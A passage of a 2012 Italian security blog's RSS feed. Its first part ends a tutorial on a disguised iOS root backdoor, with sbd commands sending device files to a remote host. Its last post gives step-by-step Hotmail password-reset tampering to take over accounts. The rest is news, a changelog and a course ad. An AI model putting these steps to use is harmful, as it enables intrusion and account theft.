501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef

bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
</pre>
<p><strong>Se per esempio vogliamo trasferire un file dal dispositivo</strong></p>
<pre class="brush: plain; title: ; notranslate">
root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret &gt; output.file

iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345
</pre>
<p><strong>Infine vi riportiamo la procedura per disinstallare la Backdoor</strong></p>
<pre class="brush: plain; title: ; notranslate">
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper
</pre>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/Fz-05zDWzho" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/05/03/creiamo-una-backdoor-permanente-su-ios/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/05/03/creiamo-una-backdoor-permanente-su-ios/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=creiamo-una-backdoor-permanente-su-ios</feedburner:origLink></item>
		<item>
		<title>Tails – La distribuzione Linux dedicata alla Privacy si aggiorna</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/hFpu_xiHFok/</link>
		<comments>http://www.oversecurity.net/2012/05/02/tails-la-distribuzione-linux-dedicata-alla-privacy-si-aggiorna/#comments</comments>
		<pubDate>Wed, 02 May 2012 08:00:13 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[0.11]]></category>
		<category><![CDATA[anonimato]]></category>
		<category><![CDATA[change log]]></category>
		<category><![CDATA[Distribuzione]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[Tails]]></category>
		<category><![CDATA[tor]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3750</guid>
		<description><![CDATA[Tails e’ una distribuzione Debian live in cui tutto in traffico di rete viene rediretto attraverso Tor, e che contiene i principali applicativi per la privacy in Rete già correttamente installati. È distribuita come immagine iso ibrida, che puo’ essere avviata in modalità Live USB o Live CD attraverso la ISO distribuita gratuitamente dagli sviluppatori. [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/MS-cff57kS5ERKYdbsWUEeaIg58/0/da"><img src="http://feedads.g.doubleclick.net/~a/MS-cff57kS5ERKYdbsWUEeaIg58/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/MS-cff57kS5ERKYdbsWUEeaIg58/1/da"><img src="http://feedads.g.doubleclick.net/~a/MS-cff57kS5ERKYdbsWUEeaIg58/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2012/01/tails_logo.png" rel="lightbox[3750]" title="tails_logo"><img src='http://www.oversecurity.net/wp-content/uploads/2012/01/tails_logo.png' class='aligncenter size-full wp-image-3300' width='600' height='450'/></a></p>
<p><strong>Tails</strong> e’ una distribuzione Debian live in cui tutto in traffico di rete viene rediretto attraverso Tor, e che contiene i principali applicativi per la privacy in Rete già correttamente installati. È distribuita come immagine iso ibrida, che puo’ essere avviata in modalità<strong> Live USB</strong> o <strong>Live CD</strong> attraverso la ISO distribuita gratuitamente dagli sviluppatori.</p>
<p>Tails permette di utilizzare Internet in <strong>forma anonima</strong> quasi ovunque si vada e su qualsiasi computer poichè tutte le connessioni generate saranno inoltrare alla <strong>rete Tor</strong>, essendo una distribuzione Live potrai eliminare tutte le tracce dal PC in uso ed inoltre contiene i principali tools per <strong>crittografare</strong> le tue eMail, messaggi istantanei o file.</p>
<p>E&#8217; stata rilasciata recentemente la versione 0.11 con notevoli cambiamenti, trovate il <strong>Change Log</strong> dopo il salto, per chi fosse interessato all&#8217;applicazione può trovare <strong>maggiori dettagli</strong> e i link per il <strong>download</strong> sul <a href="https://tails.boum.org/" target="_blank">sito ufficiale</a>.</p>
<p><span id="more-3750"></span></p>
<h3><strong>Change Log<br />
</strong></h3>
<blockquote>
<pre>tails (0.11) unstable; urgency=low

  * Major new features
  - Do not grant the desktop user root credentials by default.
  - A graphical boot menu (tails-greeter 0.6.3) allows choosing among
    many languages, and setting an optional sudoer password.
  - Support opt-in targeted persistence
    Â· tails-persistence-setup 0.14-1
    Â· live-boot 3.0~a25-1+tails1~5.gbp48d06c
    Â· live-config 3.0~a35-1
  - USB installer: liveusb-creator 3.11.6-1

  * iceweasel
  - Install iceweasel 10.0.4esr-1 (Extended Support Release).
    Let's stop tracking a too fast moving target.
    Debian Wheezy will ship ESR versions.
  - Install needed dependencies from squeeze-backports.
  - Search plugins:
    Â· Remove bing.
      bing appeared due to our upgrading iceweasel.
      Removing it makes things consistent with the way they have been
      until now, that is: let's keep only the general search engines
      we've been asked to add, plus Google, and a few specialized ones.
    Â· Replace Debian-provided DuckDuckGo search plugin with the "HTML SSL"
      one, version 20110219. This is the non-JavaScript, SSL, POST flavour.
    Â· Add ixquick.com.
    Â· Install localized search engines in the correct place.
      No need to copy them around at boot time anymore.
    Â· Remove Scroogle. RIP.
  - Enable TLS false start, like the TBB does since December.
  - Adblock Plus: don't count and save filter hits, supress first run dialog.
  - Install neither the GreaseMonkey add-on, nor any GreaseMonkey script.
    YouTube's HTML5 opt-in program is over.
    HTML5 video support is now autodetected and used.

  * Vidalia
  - Upgrade to 0.2.17-1+tails1: drop Do-not-warn-about-Tor-version.patch,
    applied upstream.
  - Set SkipVersionCheck=true.
    Thanks to chiiph for implementing this upstream (needs Vidalia 0.2.16+).

  * Internationalization
  - Install all available iceweasel l10n packages.
  - Remove syslinux language choosing menu.
    tails-greeter allows choosing a non-English language.
  - Add fonts for Hebrew, Thai, Khmer, Lao and Korean languages.
  - Add bidi support.
  - Setup text console at profile time.
    Context: Tails runs with text console autologin on.
    These consoles now wait, using a "Press enter to activate this console"
    message, for the user. When they press enter in there, they should have chosen
    their preferred keyboard layout in tails-greeter by now. Then, we run setupcon.
    As a result, the resulting shell is properly localized, and setupcon
    sets the correct keyboard layout, both according to the preferences expressed by
    the user in tails-greeter.
  - Don't use localepurge, don't remove any Scribus translations anymore,
    don't localize environment at live-config time:
    tails-greeter allows us to support many, many more languages.

  * Hardware support
  - Linux 3.2.15-1 (linux-image-3.2.0-2-amd64).
  - Fix low sound level on MacBook5,2.
  - Disable laptop-mode-tools automatic modules. This modules set often
    needs some amount of hardware-specific tweaking to work properly.
    This makes them rather not well suited for a Live system.

  * Software
  - Install GNOME keyring.
    This is needed so that NetworkManager remembers the WEP/WPA secrets
    for the time of a Tails session. Initialize GNOME keyring at user
    creation time.
  - Install usbutils to have the lsusb command.
  - Install the Traverso multitrack audio recorder and editor.

  * Miscellaneous
  - GNOME Terminal: keep 8192 scrollback lines instead of the smallish
    default.
  - Replaced tails-wifi initscript with laptop-mode-tools matching feature.
  - Disable gdomap service.
  - Fetch klibc-utils and libklibc from sid.
    The last initramfs-tools depends on these.
  - Set root password to "root" if debug=root is passed on the
    kernel cmdline. Allow setting root password on kernel cmdline via
    rootpw=. Looks like we implemented this feature twice.
  - Append a space on the kernel command line. This eases manually adding
    more options.
  - Rename sudoers.d snippets to match naming scheme.
    Sudo credentials that shall be unconditionally granted to the Tails
    default user are named zzz_*, to make sure they are applied.
  - WhisperBack: also include /var/log/live-persist and
    /var/lib/gdm3/tails.persistence.
  - Add a wrapper to torify whois.
  - Rework the VirtualBox guest modules building hook to support
    multiple kernels.
  - Consistently wait for nm-applet when waiting for user session to come up.
    Waiting for gnome-panel or notification-daemon worked worse.
  - Don't start the NetworkManager system service via init.
    Some Tails NM hooks need the user to be logged in to run properly.
    That's why tails-greeter starts NetworkManager at PostLogin time.
  - Also lock /bin/echo into memory. For some reason, kexec-load needs it.
  - Pidgin: don't use the OFTC hidden service anymore.
    It proved to be quite unreliable, being sometimes down for days.
  - Do not display storage volumes on Desktop, by disabling
    /apps/nautilus/desktop/volumes_visible GConf entry. Enabling that
    GConf setting avoids displaying the bind-mounted persistent
    directories on the Desktop, and reduces user confusion. It also is
    a first step towards a bigger UI change: GNOME3 does not manage the
    Desktop anymore, so volume icons and other Desktop icons are meant to
    disappear anyway. It implies we'll have to move all Desktop icons
    elsewhere. Let's start this move now: this will smooth the UI change
    Wheezy will carry for our users, by applying some of it progressively.

  * Build system
  - Don't build hybrid ISO images anymore. They boot less reliably on
    a variety of hardware, and are made less useful by us shipping
    a USB installer from now on.
  - Append .conf to live-config configuration filenames:
    live-config &gt;3.0~a36-1 only takes into account files named *.conf
    in there. Accordingly update scripts that source these files.
  - Remove long-obsolete home-refresh script and its configuration.

  * Virtualization support
  - Support Spice and QXL: install the Spice agent from Debian sid,
    install xserver-xorg-video-qxl from squeeze-backports.

 -- Tails developers &lt;amnesia@boum.org&gt;  Tue, 17 Apr 2012 14:54:00 +0200</pre>
</blockquote>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/hFpu_xiHFok" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/05/02/tails-la-distribuzione-linux-dedicata-alla-privacy-si-aggiorna/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/05/02/tails-la-distribuzione-linux-dedicata-alla-privacy-si-aggiorna/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=tails-la-distribuzione-linux-dedicata-alla-privacy-si-aggiorna</feedburner:origLink></item>
		<item>
		<title>[eBook] Mafia.com. Soldi, guerra e spionaggio: inchiesta sul lato oscuro della rete</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/gu31c6dZdtc/</link>
		<comments>http://www.oversecurity.net/2012/05/01/ebook-mafia-com-soldi-guerra-e-spionaggio-inchiesta-sul-lato-oscuro-della-rete/#comments</comments>
		<pubDate>Tue, 01 May 2012 08:00:31 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[Cracker]]></category>
		<category><![CDATA[Cyber Crime]]></category>
		<category><![CDATA[ebook]]></category>
		<category><![CDATA[libro]]></category>
		<category><![CDATA[mafia.com]]></category>
		<category><![CDATA[società digitale globalizzata]]></category>
		<category><![CDATA[società digitalizzata]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3731</guid>
		<description><![CDATA[I computer influenzano gran parte delle nostre vite: governano le nostre comunicazioni, le nostre automobili, le nostre attività commerciali, i nostri rapporti con lo stato, il nostro tempo libero. Online abbiamo i conti bancari, facciamo acquisti, diamo appuntamenti, studiamo e lavoriamo. Viviamo in una società digitale globalizzata che offre enormi vantaggi, ma nasconde anche pericolose [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/8lVmnJA4w4bE0ZTOzIxrVF28zbs/0/da"><img src="http://feedads.g.doubleclick.net/~a/8lVmnJA4w4bE0ZTOzIxrVF28zbs/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/8lVmnJA4w4bE0ZTOzIxrVF28zbs/1/da"><img src="http://feedads.g.doubleclick.net/~a/8lVmnJA4w4bE0ZTOzIxrVF28zbs/1/di" border="0" ismap="true"></img></a></p><p style="text-align: center;"><a href="http://www.oversecurity.net/wp-content/uploads/2012/04/mafia.com_.png" rel="lightbox[3731]" title="mafia.com"><img src='http://www.oversecurity.net/wp-content/uploads/2012/04/mafia.com_-1024x646.png' class='aligncenter  wp-image-3732' width='600' height='378.515625'/></a></p>
<p>I computer influenzano gran parte delle nostre vite: governano le nostre comunicazioni, le nostre automobili, le nostre attività commerciali, i nostri rapporti con lo stato, il nostro tempo libero. Online abbiamo i conti bancari, facciamo acquisti, diamo appuntamenti, studiamo e lavoriamo. Viviamo in una<strong> società digitale globalizzata</strong> che offre enormi vantaggi, ma nasconde anche pericolose insidie. Ogni volta che accendiamo un computer, apriamo una mail, digitiamo il pin del nostro bancomat o strisciamo la nostra carta di credito rischiamo che ci vengano sottratti identità, informazioni, segreti e soldi. Ogni anno il settore pubblico e quello privato perdono enormi somme di denaro a causa di un nuovo tipo di reato, il &#8220;<strong>cyber-crime</strong>&#8220;, e di un nuovo tipo di criminale, il &#8220;<strong>cracker</strong>&#8220;, come è chiamato l&#8217;hacker disonesto. Invisibile, spesso molto intelligente, questo pirata informatico è un delinquente tecnologicamente evoluto che si arricchisce rubando codici di accesso di conti correnti online, numeri di carta di credito, eludendo o forzando i sistemi di sicurezza. Negli ultimi anni però questi truffatori attivi in rete non lavorano più da soli, si sono organizzati come vere e proprie mafie tradizionali, con la differenza che non smerciano droga o armi, ma dati personali di singoli o di società, segreti industriali, password o codici. E proprio come per un&#8217;efficiente attività commerciale questa malavita informatica ha creato dei siti web dove scambiarsi dati e informazioni. Misha Glenny, autore del bestseller internazionale <em>McMafia</em>, ricostruisce la mappa di un labirinto illegale in formato digitale, difficilissimo da decodificare per i non iniziati. Seguendo le orme digitali lasciate dai primi siti illeciti, CarderPlanet e Shadowcrew, l&#8217;autore s&#8217;imbatte in DarkMarket, il più prestigioso &#8220;criminal website&#8221;, e ne ricostruisce la storia, che si snoda tra Germania e Ucraina, Turchia e Gran Bretagna. Glenny rintraccia e intervista i protagonisti (i truffatori online, i fanatici di computer, i poliziotti della rete, gli esperti di sicurezza e le vittime) e ci regala un appassionante reportage in cui si intrecciano politica, economia e storia. Per farci scoprire che dietro a quello che sembra l&#8217;innocente schermo del nostro computer si nasconde una galassia inquietante, terreno di una battaglia criminale non meno violenta e pericolosa di quella tradizionale.</p>
<p>È possibile acquistare il libro sul sito ufficiale di <a href="http://www.bol.it/libri/Mafia.com.-Soldi-guerra/Misha-Glenny/ea978880461936/;jsessionid=4E736F77C5B4B885DAE0B598B2CDBB57" target="_blank">Bol.it</a> in versione cartacea o eBook.</p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/gu31c6dZdtc" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/05/01/ebook-mafia-com-soldi-guerra-e-spionaggio-inchiesta-sul-lato-oscuro-della-rete/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/05/01/ebook-mafia-com-soldi-guerra-e-spionaggio-inchiesta-sul-lato-oscuro-della-rete/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=ebook-mafia-com-soldi-guerra-e-spionaggio-inchiesta-sul-lato-oscuro-della-rete</feedburner:origLink></item>
		<item>
		<title>Statistiche sullo Spam nel primo trimestre del 2012</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/YBUSFxR6Np4/</link>
		<comments>http://www.oversecurity.net/2012/04/30/statistiche-sullo-spam-nel-primo-trimestre-del-2012/#comments</comments>
		<pubDate>Mon, 30 Apr 2012 08:00:52 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[Classifica]]></category>
		<category><![CDATA[Graham Clueley]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Sophos]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3708</guid>
		<description><![CDATA[La società di sicurezza informatica Sophos ha rilevato la classifica dei paesi maggiormente produttori di spam, l&#8217;India ha conquistato il primo posto precedendo gli Stati Uniti. Il 9,3% delle eMail spazzatura inviate in tutto il mondo provengono o passano attraverso l&#8217;India. Sguono Stati Uniti (8,3%), Corea del Sud (5,7%), Indonesia e Russia alla pari (5%), [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/MMvGs7d6zHU9sFdDZtNvBLK2K-I/0/da"><img src="http://feedads.g.doubleclick.net/~a/MMvGs7d6zHU9sFdDZtNvBLK2K-I/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/MMvGs7d6zHU9sFdDZtNvBLK2K-I/1/da"><img src="http://feedads.g.doubleclick.net/~a/MMvGs7d6zHU9sFdDZtNvBLK2K-I/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2012/04/spam.jpg" rel="lightbox[3708]" title="spam"><img class="aligncenter size-full wp-image-3709" title="spam" src="http://www.oversecurity.net/wp-content/uploads/2012/04/spam.jpg" alt="" width="400" height="306" /></a></p>
<p>La società di sicurezza informatica <strong>Sophos</strong> ha rilevato la <strong>classifica</strong> dei paesi maggiormente produttori di <strong>spam</strong>, l&#8217;India ha conquistato il primo posto precedendo gli Stati Uniti. Il 9,3% delle eMail spazzatura inviate in tutto il mondo provengono o passano attraverso l&#8217;India.</p>
<p>Sguono Stati Uniti (8,3%), Corea del Sud (5,7%), Indonesia e Russia alla pari (5%), Italia (4,9%), Brasile (4,3%). Secondo <strong>Graham Clueley</strong>, consulente della Sophos citato sulla Bbc, il primato indiano e’ legato alla forte crescita dell’uso d’Internet in questo Paese, dove molti internauti non hanno ancora imparato a difendersi dai virus informatici che trasformano i loro computer in “zombie” che diffondono spam. La diffusione dello spam viene veicolata anche tramite i social network.</p>
<p style="text-align: right;">Via | AdnKronos</p>
<p>&nbsp;</p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/YBUSFxR6Np4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/04/30/statistiche-sullo-spam-nel-primo-trimestre-del-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/04/30/statistiche-sullo-spam-nel-primo-trimestre-del-2012/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=statistiche-sullo-spam-nel-primo-trimestre-del-2012</feedburner:origLink></item>
		<item>
		<title>D3Lab – Corso di Malware Analysis</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/Iush0aLH54o/</link>
		<comments>http://www.oversecurity.net/2012/04/29/d3lab-corso-di-malware-analysis/#comments</comments>
		<pubDate>Sun, 29 Apr 2012 08:00:46 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[corso di malware analysis]]></category>
		<category><![CDATA[d3lab]]></category>
		<category><![CDATA[Gianni Amato]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[Sicurezza Informatica]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3704</guid>
		<description><![CDATA[Il D3Lab propone per il prossimo 6, 7 e 8 Giugno 2012 a Ivrea un corso di 24h sul Malware Analysis tenuto da Gianni Amato esperto di  Sicurezza Informatica e Computer Forensics. Il corso è rivolto ad amministratori di rete, operatori della sicurezza ICT, personale impiegato in infrastrutture a rischio, consulenti tecnici operanti a supporto [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/ENVOZoO_k5n6ahCw4ti8yoqCw7Q/0/da"><img src="http://feedads.g.doubleclick.net/~a/ENVOZoO_k5n6ahCw4ti8yoqCw7Q/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/ENVOZoO_k5n6ahCw4ti8yoqCw7Q/1/da"><img src="http://feedads.g.doubleclick.net/~a/ENVOZoO_k5n6ahCw4ti8yoqCw7Q/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2012/04/d3lab_logo.png" rel="lightbox[3704]" title="d3lab_logo"><img class="aligncenter size-full wp-image-3705" title="d3lab_logo" src="http://www.oversecurity.net/wp-content/uploads/2012/04/d3lab_logo.png" alt="" width="600" height="300" /></a>Il D3Lab propone per il prossimo 6, 7 e 8 Giugno 2012 a Ivrea un corso di 24h sul <strong>Malware Analysis</strong> tenuto da Gianni Amato esperto di  Sicurezza Informatica e Computer Forensics.</p>
<p>Il corso è <strong>rivolto</strong> ad amministratori di rete, operatori della sicurezza ICT, personale impiegato in infrastrutture a rischio, consulenti tecnici operanti a supporto di legali, Forze di Polizia e Autorità Giudiziaria con l&#8217;<strong>obbiettivo</strong> di trasmettere competenze, metodologie e procedure atte a consentire il riconoscimenti del codice malevolo, valutarne l&#8217;impatto sui sistemi, identificare le modifiche ad essi apportate ed a raccogliere indizi utili ad identificare gli autori ed i distributori.</p>
<div><strong>Programma:</strong></div>
<ol>
<li>Introduzione al Malware<br />
Classificazione<br />
Metodologie di Analisi<br />
Identificazione e protezione<br />
Considerazioni legali</li>
<li>Preparazione di un laboratorio di analisi<br />
Sistemi virtualizzati<br />
Malware Analysis tool<br />
Identificazione del malware da Live system<br />
Identificazione del malware da Dead system</li>
<li>Analisi Statica<br />
Gli hash DB<br />
Data di compilazione<br />
Estrazione delle stringhe<br />
Packing e metodi di offuscazione<br />
API e DLL<br />
Le dipendenze<br />
Scansioni locali e online</li>
<li>Analisi Dinamica<br />
Host Integrity Monitor<br />
Monitoring dei processi<br />
Monitoring dei file<br />
Monitoring delle Porte<br />
Monitoring dei DNS<br />
Monitoring e Analisi del Registro<br />
Monitoring e Analisi del Network</li>
<li>Analisi del Codice<br />
Strumenti per il malware forensics<br />
Analisi comportamentale di un eseguibile<br />
Heap Memory Leaks<br />
Packing e offuscatori<br />
Unpacking e Decodificatori<br />
Debug del codice<br />
Analisi di documenti maliziosi (pdf)<br />
Malicious browser script: Javascript e VBScript</li>
<li>Tecniche Anti-Malware-Analysis<br />
Anti-Debug<br />
Anti-Forensic<br />
Contromisure</li>
</ol>
<p><strong>Costo:</strong></p>
<p>800 Euro I.V.A. inclusa</p>
<p><strong>Prerequisiti:</strong><br />
Conoscenza e capacità uso sistemi operativi Ms WIndows e GNU/Linux, il partecipante deve essere dotato di computer portatile per lo svolgimento degli esercizi.</p>
<p><strong>Partecipazione:</strong><br />
A seguito di un Vostro contratto riceverete conferma della disponibilità dei posti che vi saranno riservati previo versamento, a mezzo bonifico bancario,  di un acconto di Euro 100,00, con saldo il primo giorno di corso.</p>
<p><strong>Dove:</strong><br />
Il corso si tiene ad Ivrea presso l&#8217;aula della DTC PAL S.r.l. in Via Torino 50.</p>
<p><strong>Iscrizione:</strong></p>
<p>Per qualsiasi informazione potete consultare il sito ufficiale del <a href="http://www.d3lab.net/index.php/formazione-corsi/corso-malware-analysis" target="_blank">D3Lab</a>.</p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/Iush0aLH54o" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/04/29/d3lab-corso-di-malware-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/04/29/d3lab-corso-di-malware-analysis/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=d3lab-corso-di-malware-analysis</feedburner:origLink></item>
		<item>
		<title>Hotmail, Yahoo e AOL – Vulnerabilità 0Day nel Reset delle Password</title>
		<link>http://feedproxy.google.com/~r/OverSecurity/~3/E9KxgOiQmT8/</link>
		<comments>http://www.oversecurity.net/2012/04/29/hotmail-yahoo-e-aol-vulnerabilita-0day-nel-reset-delle-password/#comments</comments>
		<pubDate>Sat, 28 Apr 2012 22:13:08 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[AOL]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Hotmail]]></category>
		<category><![CDATA[recupero password]]></category>
		<category><![CDATA[Tamper Data]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3760</guid>
		<description><![CDATA[Ieri The Hacker News aveva segnalato una vulnerabilità nella funzione di recupero/reset della password dell&#8217;account di Hotmail, che permette di reimpostare le password degli account e bloccare l&#8217;accesso ai veri proprietari. La vulnerabilità è stata prontamente corretta da Microsfoft la quale ha anche confermato l&#8217;esistenza della falla. Oggi l&#8217;hacker diversi hacker hanno svelato invece un&#8217;altra [...]]]></description>
			<content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/01ErKpkUMY7_bNFGqApZgjhv8sw/0/da"><img src="http://feedads.g.doubleclick.net/~a/01ErKpkUMY7_bNFGqApZgjhv8sw/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/01ErKpkUMY7_bNFGqApZgjhv8sw/1/da"><img src="http://feedads.g.doubleclick.net/~a/01ErKpkUMY7_bNFGqApZgjhv8sw/1/di" border="0" ismap="true"></img></a></p><p><a href="http://www.oversecurity.net/wp-content/uploads/2010/04/exploit.jpg" rel="lightbox[3760]" title="exploit"><img class="aligncenter size-full wp-image-498" title="exploit" src="http://www.oversecurity.net/wp-content/uploads/2010/04/exploit.jpg" alt="" width="576" height="480" /></a></p>
<p>Ieri <a href="http://thehackernews.com/2012/04/0day-remote-password-reset.html" target="_blank">The Hacker News</a> aveva segnalato una vulnerabilità nella funzione di recupero/reset della password dell&#8217;account di Hotmail, che permette di reimpostare le password degli account e bloccare l&#8217;accesso ai veri proprietari. La vulnerabilità è stata prontamente corretta da Microsfoft la quale ha anche confermato l&#8217;esistenza della falla.</p>
<p>Oggi l&#8217;hacker diversi hacker hanno svelato invece un&#8217;altra <strong>vulnerabilità</strong> che affligge i servizi di <strong>Hotmail, Yahoo e AOL</strong>.</p>
<p>La <strong>nuova vulnerabilità</strong> individuata sfrutta il plug-in <a href="https://addons.mozilla.org/it/firefox/addon/tamper-data/" target="_blank">Tamper Data</a> di Fifefox in grado di vedere ed editare le richieste HTTP/HTTPS degli Header e Post in tempo reale.</p>
<p>Sono state dimostrate le vulnerabilità attraverso due video che vi riportiamo assieme a una breve guida per ogni servizio:</p>
<h2>Hotmail</h2>
<p><a href="http://www.oversecurity.net/wp-content/uploads/2012/04/Hotmail.png" rel="lightbox[3760]" title="Hotmail"><img class="aligncenter size-medium wp-image-3763" title="Hotmail" src="http://www.oversecurity.net/wp-content/uploads/2012/04/Hotmail-300x115.png" alt="" width="300" height="115" /></a></p>
<ol>
<li><strong></strong>Vai a questa pagina https://maccount.live.com/ac/resetpwdmain.aspx;</li>
<li><strong></strong>Inserisci l&#8217;indirizzo email e inserire i 6 caratteri che vedi;</li>
<li><strong></strong>Avvia Tamper Data;</li>
<li>Elimina elemento &#8220;SendEmail_ContinueCmd&#8221;;</li>
<li>Editare l&#8217;elemento &#8220;__V_previousForm&#8221; con il valore &#8220;ResetOptionForm&#8221;;</li>
<li>Editare l&#8217;elemento &#8220;__viewstate&#8221; con il valore &#8220;%%% 2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw 2Fak6gMIVsxSlDMZxkMkI 2BEPFW&#8221;;</li>
<li>Fare clic su OK e digitare la nuova password;</li>
<li>Avviare Tamper Data e aggiungere l&#8217;elemento &#8220;__V_SecretAnswerProf&#8221;</li>
<li>Fatto.</li>
</ol>
<p><strong>Video</strong></p>
